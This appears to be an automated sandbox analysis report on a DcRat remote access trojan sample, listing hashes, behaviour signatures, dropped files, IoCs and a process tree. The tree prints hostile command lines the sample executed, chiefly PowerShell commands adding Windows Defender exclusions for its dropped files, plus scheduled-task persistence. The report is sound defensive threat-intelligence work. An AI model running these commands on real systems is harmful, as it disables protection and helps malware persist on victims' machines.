Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
22-12-2024 04:28
Behavioral task
behavioral1
Sample
JaffaCakes118_28c5a31d5015f85f87106a7e876e78aa94801b36fd57d87272315d74c42fb9f7.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
JaffaCakes118_28c5a31d5015f85f87106a7e876e78aa94801b36fd57d87272315d74c42fb9f7.exe
Resource
win10v2004-20241007-en
General
-
Target
JaffaCakes118_28c5a31d5015f85f87106a7e876e78aa94801b36fd57d87272315d74c42fb9f7.exe
-
Size
1.3MB
-
MD5
86530bf4b3d606a1f3031a93d8d02712
-
SHA1
9a4ebab5ec898e73aa30c28fd695ec95e6e6e22b
-
SHA256
28c5a31d5015f85f87106a7e876e78aa94801b36fd57d87272315d74c42fb9f7
-
SHA512
f42cc0f5a0a1a909a9f16a6c08a882dee15ca34e4b6514d2e35c3eb3a0206f11f8cb8230c483baede054248bd93afafe505e524c4d7549aa9e8afb983d1fe771
-
SSDEEP
24576:U2G/nvxW3Ww0t6TnzGmVBDh4+aknuRRZJND0gFJ4rD/IjC:UbA30GnzV/q+DnsXg
Malware Config
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Dcrat family
-
Process spawned unexpected child process 36 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5036 3588 schtasks.exe 86 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5084 3588 schtasks.exe 86 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2636 3588 schtasks.exe 86 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2800 3588 schtasks.exe 86 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3680 3588 schtasks.exe 86 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2012 3588 schtasks.exe 86 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4148 3588 schtasks.exe 86 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 444 3588 schtasks.exe 86 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 292 3588 schtasks.exe 86 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2112 3588 schtasks.exe 86 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3020 3588 schtasks.exe 86 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 392 3588 schtasks.exe 86 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3112 3588 schtasks.exe 86 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4712 3588 schtasks.exe 86 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1364 3588 schtasks.exe 86 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2972 3588 schtasks.exe 86 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2232 3588 schtasks.exe 86 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4512 3588 schtasks.exe 86 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 808 3588 schtasks.exe 86 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5064 3588 schtasks.exe 86 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2328 3588 schtasks.exe 86 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1448 3588 schtasks.exe 86 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3128 3588 schtasks.exe 86 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1476 3588 schtasks.exe 86 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4124 3588 schtasks.exe 86 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1468 3588 schtasks.exe 86 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2932 3588 schtasks.exe 86 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2584 3588 schtasks.exe 86 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4452 3588 schtasks.exe 86 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3460 3588 schtasks.exe 86 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1064 3588 schtasks.exe 86 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3596 3588 schtasks.exe 86 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1168 3588 schtasks.exe 86 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5096 3588 schtasks.exe 86 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 776 3588 schtasks.exe 86 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1268 3588 schtasks.exe 86 -
resource yara_rule behavioral2/files/0x000a000000023b8a-10.dat dcrat behavioral2/memory/3544-13-0x0000000000780000-0x0000000000890000-memory.dmp dcrat -
Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3352 powershell.exe 3524 powershell.exe 1808 powershell.exe 4056 powershell.exe 1216 powershell.exe 2508 powershell.exe 4776 powershell.exe 296 powershell.exe 3320 powershell.exe 2744 powershell.exe 5000 powershell.exe 4108 powershell.exe 3628 powershell.exe -
Checks computer location settings 2 TTPs 14 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation JaffaCakes118_28c5a31d5015f85f87106a7e876e78aa94801b36fd57d87272315d74c42fb9f7.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation WmiPrvSE.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation WmiPrvSE.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation WmiPrvSE.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation WmiPrvSE.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation WmiPrvSE.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation WmiPrvSE.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation WmiPrvSE.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation WmiPrvSE.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation WmiPrvSE.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation DllCommonsvc.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation WmiPrvSE.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation WmiPrvSE.exe -
Executes dropped EXE 13 IoCs
pid Process 3544 DllCommonsvc.exe 4448 WmiPrvSE.exe 4712 WmiPrvSE.exe 4528 WmiPrvSE.exe 2928 WmiPrvSE.exe 4752 WmiPrvSE.exe 2972 WmiPrvSE.exe 4548 WmiPrvSE.exe 948 WmiPrvSE.exe 1452 WmiPrvSE.exe 2404 WmiPrvSE.exe 2308 WmiPrvSE.exe 4056 WmiPrvSE.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 12 IoCs
flow ioc 49 raw.githubusercontent.com 19 raw.githubusercontent.com 36 raw.githubusercontent.com 46 raw.githubusercontent.com 47 raw.githubusercontent.com 48 raw.githubusercontent.com 50 raw.githubusercontent.com 20 raw.githubusercontent.com 22 raw.githubusercontent.com 37 raw.githubusercontent.com 40 raw.githubusercontent.com 41 raw.githubusercontent.com -
Drops file in Program Files directory 10 IoCs
description ioc Process File created C:\Program Files\WindowsPowerShell\Configuration\Registration\explorer.exe DllCommonsvc.exe File created C:\Program Files\WindowsPowerShell\Configuration\Registration\7a0fd90576e088 DllCommonsvc.exe File created C:\Program Files\Windows Media Player\Network Sharing\DllCommonsvc.exe DllCommonsvc.exe File created C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\9e8d7a4ca61bd9 DllCommonsvc.exe File created C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Registry.exe DllCommonsvc.exe File created C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\ee2ad38f3d4382 DllCommonsvc.exe File created C:\Program Files (x86)\WindowsPowerShell\Modules\RuntimeBroker.exe DllCommonsvc.exe File created C:\Program Files (x86)\WindowsPowerShell\Modules\9e8d7a4ca61bd9 DllCommonsvc.exe File created C:\Program Files\Windows Media Player\Network Sharing\a76d7bf15d8370 DllCommonsvc.exe File created C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\RuntimeBroker.exe DllCommonsvc.exe -
Drops file in Windows directory 9 IoCs
description ioc Process File created C:\Windows\System\RuntimeBroker.exe DllCommonsvc.exe File created C:\Windows\System\9e8d7a4ca61bd9 DllCommonsvc.exe File created C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe DllCommonsvc.exe File created C:\Windows\ImmersiveControlPanel\0a1fd5f707cd16 DllCommonsvc.exe File created C:\Windows\Migration\WTR\System.exe DllCommonsvc.exe File opened for modification C:\Windows\System\RuntimeBroker.exe DllCommonsvc.exe File created C:\Windows\SystemResources\Windows.UI.Search\Images\24dbde2999530e DllCommonsvc.exe File created C:\Windows\ImmersiveControlPanel\sppsvc.exe DllCommonsvc.exe File created C:\Windows\Migration\WTR\27d1bcfc3c54e0 DllCommonsvc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language JaffaCakes118_28c5a31d5015f85f87106a7e876e78aa94801b36fd57d87272315d74c42fb9f7.exe -
Modifies registry class 13 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings WmiPrvSE.exe Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings WmiPrvSE.exe Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings WmiPrvSE.exe Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings WmiPrvSE.exe Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings DllCommonsvc.exe Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings WmiPrvSE.exe Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings WmiPrvSE.exe Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings WmiPrvSE.exe Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings WmiPrvSE.exe Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings WmiPrvSE.exe Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings WmiPrvSE.exe Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings JaffaCakes118_28c5a31d5015f85f87106a7e876e78aa94801b36fd57d87272315d74c42fb9f7.exe Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings WmiPrvSE.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 36 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4712 schtasks.exe 2232 schtasks.exe 1476 schtasks.exe 4124 schtasks.exe 5036 schtasks.exe 2932 schtasks.exe 2584 schtasks.exe 5096 schtasks.exe 3112 schtasks.exe 808 schtasks.exe 1468 schtasks.exe 776 schtasks.exe 5084 schtasks.exe 2800 schtasks.exe 4148 schtasks.exe 1064 schtasks.exe 292 schtasks.exe 1364 schtasks.exe 4512 schtasks.exe 3128 schtasks.exe 2636 schtasks.exe 2112 schtasks.exe 2328 schtasks.exe 1268 schtasks.exe 5064 schtasks.exe 1448 schtasks.exe 3596 schtasks.exe 1168 schtasks.exe 2012 schtasks.exe 3020 schtasks.exe 392 schtasks.exe 2972 schtasks.exe 3680 schtasks.exe 444 schtasks.exe 4452 schtasks.exe 3460 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 54 IoCs
pid Process 3544 DllCommonsvc.exe 3544 DllCommonsvc.exe 3544 DllCommonsvc.exe 4056 powershell.exe 4056 powershell.exe 3628 powershell.exe 3628 powershell.exe 4108 powershell.exe 4108 powershell.exe 4776 powershell.exe 4776 powershell.exe 3524 powershell.exe 3524 powershell.exe 1808 powershell.exe 1808 powershell.exe 2744 powershell.exe 2744 powershell.exe 296 powershell.exe 296 powershell.exe 5000 powershell.exe 5000 powershell.exe 3320 powershell.exe 3320 powershell.exe 3352 powershell.exe 3352 powershell.exe 1216 powershell.exe 1216 powershell.exe 3352 powershell.exe 2508 powershell.exe 2508 powershell.exe 3524 powershell.exe 1808 powershell.exe 2508 powershell.exe 4776 powershell.exe 3628 powershell.exe 4056 powershell.exe 4108 powershell.exe 1216 powershell.exe 2744 powershell.exe 3320 powershell.exe 5000 powershell.exe 296 powershell.exe 4448 WmiPrvSE.exe 4712 WmiPrvSE.exe 4528 WmiPrvSE.exe 2928 WmiPrvSE.exe 4752 WmiPrvSE.exe 2972 WmiPrvSE.exe 4548 WmiPrvSE.exe 948 WmiPrvSE.exe 1452 WmiPrvSE.exe 2404 WmiPrvSE.exe 2308 WmiPrvSE.exe 4056 WmiPrvSE.exe -
Suspicious use of AdjustPrivilegeToken 26 IoCs
description pid Process Token: SeDebugPrivilege 3544 DllCommonsvc.exe Token: SeDebugPrivilege 4056 powershell.exe Token: SeDebugPrivilege 3628 powershell.exe Token: SeDebugPrivilege 4108 powershell.exe Token: SeDebugPrivilege 4776 powershell.exe Token: SeDebugPrivilege 3524 powershell.exe Token: SeDebugPrivilege 5000 powershell.exe Token: SeDebugPrivilege 1808 powershell.exe Token: SeDebugPrivilege 2744 powershell.exe Token: SeDebugPrivilege 296 powershell.exe Token: SeDebugPrivilege 3320 powershell.exe Token: SeDebugPrivilege 3352 powershell.exe Token: SeDebugPrivilege 1216 powershell.exe Token: SeDebugPrivilege 2508 powershell.exe Token: SeDebugPrivilege 4448 WmiPrvSE.exe Token: SeDebugPrivilege 4712 WmiPrvSE.exe Token: SeDebugPrivilege 4528 WmiPrvSE.exe Token: SeDebugPrivilege 2928 WmiPrvSE.exe Token: SeDebugPrivilege 4752 WmiPrvSE.exe Token: SeDebugPrivilege 2972 WmiPrvSE.exe Token: SeDebugPrivilege 4548 WmiPrvSE.exe Token: SeDebugPrivilege 948 WmiPrvSE.exe Token: SeDebugPrivilege 1452 WmiPrvSE.exe Token: SeDebugPrivilege 2404 WmiPrvSE.exe Token: SeDebugPrivilege 2308 WmiPrvSE.exe Token: SeDebugPrivilege 4056 WmiPrvSE.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3336 wrote to memory of 4024 3336 JaffaCakes118_28c5a31d5015f85f87106a7e876e78aa94801b36fd57d87272315d74c42fb9f7.exe 82 PID 3336 wrote to memory of 4024 3336 JaffaCakes118_28c5a31d5015f85f87106a7e876e78aa94801b36fd57d87272315d74c42fb9f7.exe 82 PID 3336 wrote to memory of 4024 3336 JaffaCakes118_28c5a31d5015f85f87106a7e876e78aa94801b36fd57d87272315d74c42fb9f7.exe 82 PID 4024 wrote to memory of 360 4024 WScript.exe 87 PID 4024 wrote to memory of 360 4024 WScript.exe 87 PID 4024 wrote to memory of 360 4024 WScript.exe 87 PID 360 wrote to memory of 3544 360 cmd.exe 89 PID 360 wrote to memory of 3544 360 cmd.exe 89 PID 3544 wrote to memory of 4056 3544 DllCommonsvc.exe 126 PID 3544 wrote to memory of 4056 3544 DllCommonsvc.exe 126 PID 3544 wrote to memory of 1216 3544 DllCommonsvc.exe 127 PID 3544 wrote to memory of 1216 3544 DllCommonsvc.exe 127 PID 3544 wrote to memory of 2508 3544 DllCommonsvc.exe 128 PID 3544 wrote to memory of 2508 3544 DllCommonsvc.exe 128 PID 3544 wrote to memory of 4776 3544 DllCommonsvc.exe 129 PID 3544 wrote to memory of 4776 3544 DllCommonsvc.exe 129 PID 3544 wrote to memory of 296 3544 DllCommonsvc.exe 130 PID 3544 wrote to memory of 296 3544 DllCommonsvc.exe 130 PID 3544 wrote to memory of 5000 3544 DllCommonsvc.exe 131 PID 3544 wrote to memory of 5000 3544 DllCommonsvc.exe 131 PID 3544 wrote to memory of 3524 3544 DllCommonsvc.exe 132 PID 3544 wrote to memory of 3524 3544 DllCommonsvc.exe 132 PID 3544 wrote to memory of 3352 3544 DllCommonsvc.exe 133 PID 3544 wrote to memory of 3352 3544 DllCommonsvc.exe 133 PID 3544 wrote to memory of 4108 3544 DllCommonsvc.exe 134 PID 3544 wrote to memory of 4108 3544 DllCommonsvc.exe 134 PID 3544 wrote to memory of 2744 3544 DllCommonsvc.exe 140 PID 3544 wrote to memory of 2744 3544 DllCommonsvc.exe 140 PID 3544 wrote to memory of 3628 3544 DllCommonsvc.exe 141 PID 3544 wrote to memory of 3628 3544 DllCommonsvc.exe 141 PID 3544 wrote to memory of 3320 3544 DllCommonsvc.exe 142 PID 3544 wrote to memory of 3320 3544 DllCommonsvc.exe 142 PID 3544 wrote to memory of 1808 3544 DllCommonsvc.exe 143 PID 3544 wrote to memory of 1808 3544 DllCommonsvc.exe 143 PID 3544 wrote to memory of 3760 3544 DllCommonsvc.exe 151 PID 3544 wrote to memory of 3760 3544 DllCommonsvc.exe 151 PID 3760 wrote to memory of 2244 3760 cmd.exe 155 PID 3760 wrote to memory of 2244 3760 cmd.exe 155 PID 3760 wrote to memory of 4448 3760 cmd.exe 158 PID 3760 wrote to memory of 4448 3760 cmd.exe 158 PID 4448 wrote to memory of 2256 4448 WmiPrvSE.exe 159 PID 4448 wrote to memory of 2256 4448 WmiPrvSE.exe 159 PID 2256 wrote to memory of 2008 2256 cmd.exe 161 PID 2256 wrote to memory of 2008 2256 cmd.exe 161 PID 2256 wrote to memory of 4712 2256 cmd.exe 162 PID 2256 wrote to memory of 4712 2256 cmd.exe 162 PID 4712 wrote to memory of 3512 4712 WmiPrvSE.exe 164 PID 4712 wrote to memory of 3512 4712 WmiPrvSE.exe 164 PID 3512 wrote to memory of 3628 3512 cmd.exe 166 PID 3512 wrote to memory of 3628 3512 cmd.exe 166 PID 3512 wrote to memory of 4528 3512 cmd.exe 168 PID 3512 wrote to memory of 4528 3512 cmd.exe 168 PID 4528 wrote to memory of 3612 4528 WmiPrvSE.exe 169 PID 4528 wrote to memory of 3612 4528 WmiPrvSE.exe 169 PID 3612 wrote to memory of 4740 3612 cmd.exe 171 PID 3612 wrote to memory of 4740 3612 cmd.exe 171 PID 3612 wrote to memory of 2928 3612 cmd.exe 172 PID 3612 wrote to memory of 2928 3612 cmd.exe 172 PID 2928 wrote to memory of 5028 2928 WmiPrvSE.exe 173 PID 2928 wrote to memory of 5028 2928 WmiPrvSE.exe 173 PID 5028 wrote to memory of 5076 5028 cmd.exe 175 PID 5028 wrote to memory of 5076 5028 cmd.exe 175 PID 5028 wrote to memory of 4752 5028 cmd.exe 176 PID 5028 wrote to memory of 4752 5028 cmd.exe 176 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_28c5a31d5015f85f87106a7e876e78aa94801b36fd57d87272315d74c42fb9f7.exe"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_28c5a31d5015f85f87106a7e876e78aa94801b36fd57d87272315d74c42fb9f7.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3336 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe"2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4024 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\providercommon\1zu9dW.bat" "3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:360 -
C:\providercommon\DllCommonsvc.exe"C:\providercommon\DllCommonsvc.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3544 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\DllCommonsvc.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4056
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\System\RuntimeBroker.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1216
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\Configuration\Registration\explorer.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2508
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\WindowsPowerShell\Modules\RuntimeBroker.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4776
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Media Player\Network Sharing\DllCommonsvc.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:296
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Adobe\WmiPrvSE.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5000
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3524
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ImmersiveControlPanel\sppsvc.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3352
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\RuntimeBroker.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4108
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Migration\WTR\System.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2744
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\DllCommonsvc.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3628
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\dwm.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3320
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Registry.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1808
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\I1ExlHFW7K.bat"5⤵
- Suspicious use of WriteProcessMemory
PID:3760 -
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:26⤵PID:2244
-
-
C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe"C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4448 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\zDcPfnAXs0.bat"7⤵
- Suspicious use of WriteProcessMemory
PID:2256 -
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:28⤵PID:2008
-
-
C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe"C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe"8⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4712 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Pkopelt31u.bat"9⤵
- Suspicious use of WriteProcessMemory
PID:3512 -
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:210⤵PID:3628
-
-
C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe"C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe"10⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4528 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\vCRFnHZZKP.bat"11⤵
- Suspicious use of WriteProcessMemory
PID:3612 -
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:212⤵PID:4740
-
-
C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe"C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe"12⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2928 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\pI0EcicZAo.bat"13⤵
- Suspicious use of WriteProcessMemory
PID:5028 -
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:214⤵PID:5076
-
-
C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe"C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe"14⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4752 -
